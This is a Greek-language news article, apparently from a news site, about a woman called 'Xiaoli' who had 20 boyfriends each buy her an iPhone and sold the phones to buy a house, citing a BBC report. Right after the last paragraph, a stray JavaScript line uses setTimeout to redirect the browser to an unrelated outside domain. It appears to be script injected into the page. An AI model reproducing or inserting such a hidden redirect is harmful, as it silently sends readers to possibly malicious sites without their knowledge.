Εξαπάτησε τους συντρόφους της και με τα iphone- δώρα αγόρασε σπίτι!

0
7

 

Ένα σπίτι κατάφερε να αγοράσει μια γυναίκα γνωστή με το όνομα «Xiaoli», αφού εξαπάτησε τους 20 συντρόφους της και τους έπεισε να της αγοράσουν δώρο από ένα iphone ο καθένας, σύμφωνα με το αποκαλυπτικό δημοσίευμα του το BBC

Η γυναίκα με τη μέθοδο αυτή συγκέντρωσε το ποσό των 15.500 ευρώ. Η «Xiaoli» συγκέντρωσε τα 20 iphone και τα πούλησε διαδικτυακά μέσω της ιστοσελίδας Hui Shou Bao.

Συνάδελφοί της από το γραφείο που εργάζεται αναρωτιούνται πώς να αισθάνονται οι 20 σύντροφοι που εξαπατήθηκαν.
Η Xiaoli κατάγεται από φτωχή οικογένεια, καθώς η μητέρα της είναι νοικοκυρά και ο πατέρας της μετανάστης. Η Xiaoli είναι η μεγαλύτερη κόρη της οικογένειας.

«Οι γονείς της μεγαλώνουν και ήθελε να τους προσφέρει μια ασφάλεια με το σπίτι. Αλλά είναι απίστευτη η μέθοδος που χρησιμοποίησε για να πετύχει το σκοπό της», έγραψε συνάδελφός της στα social media.

Πολλοί ήταν αυτοί που την κατέκριναν για την πράξη της ενώ άλλοι βρήκαν την πράξη της πολύ έξυπνη. Η νεαρή γυναίκα είχε ανεβάσει hashtag με το μήνυμα «20 mobiles for a house» (δηλ. 20 κινητά για ένα σπίτι) το οποίο συγκέντρωσε 13 εκατομμύρια posts.

Πολλοί αμφισβήτησαν τη γνησιότητα της ιστορίας. Πάντως η συντάκτης και blogger του BBC Ruhua Xianyu είπε πώς επικοινώνησε με τον υπεύθυνο της ιστοσελίδας ο οποίος επιβεβαίωσε ότι αγόρασε από γυναίκα πελάτη 20 iPhone 7s και πλήρωσε για το καθένα 776 ευρώ για το καθένα.

Όταν το BBC ζήτησε τα στοιχεία της γυναίκας η ιστοσελίδα είπε πώς η πελάτισσα δεν ήθελε να δοθεί άλλη δημοσιότητα στο θέμα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here